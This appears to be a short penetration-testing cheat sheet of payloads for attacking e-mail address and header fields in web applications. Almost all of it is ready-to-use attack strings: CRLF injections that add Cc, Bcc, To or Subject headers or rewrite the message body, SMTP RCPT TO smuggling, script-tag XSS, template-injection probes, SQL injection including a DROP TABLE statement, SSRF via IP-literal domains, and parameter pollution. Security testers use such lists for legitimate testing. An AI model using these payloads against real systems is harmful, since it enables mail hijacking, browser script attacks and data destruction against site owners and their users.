E-mail injection

Email Injections

Inject Cc and Bcc after sender argument

From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com

Inject argument

From:sender@domain.com%0ATo:attacker@domain.com

Inject Subject argument

From:sender@domain.com%0ASubject:This is%20Fake%20Subject

Change the body of the message

Two-line feed to change the body of the message

From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.

Inject in the e-mail name

• +, - and {} are rarely used for tagging and ignored by many e-mail servers

  Example:

  <john.doe+intigriti@example.com> → <john.doe@example.com>

• Comments between parentheses () at the beginning or the end are also ignored

  Example:

  john.doe(intigriti)@example.com → <john.doe@example.com>

IPs

IPs as domain named between square brackets:

• john.doe@[127.0.0.1]

• john.doe@[IPv6:2001:db8::1]

Other vulnerabilities

XSS

test+(<script>alert(1)</script>)@example.com

test@example(<script>alert(1)</script>).com

"<script>alert(1)</script>"@example.com

Template Injections

"<%= 7 * 7 %>"@example.com

test+(${{7*7}})@example.com

SQL injection

"' OR 1=1 --'"@example.com

"mail'); DROP TABLE users;--"@example.com

SSRF

name.surname@remote.server.domain

name.surname@[8.8.8.8]

Parameter pollution

victim&email=attacker@example.com

(Email) header injection

"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com

"recipient@test.com>\r\nRCPT TO:<victim+"@test.com

Wildcard abuse

%@example.com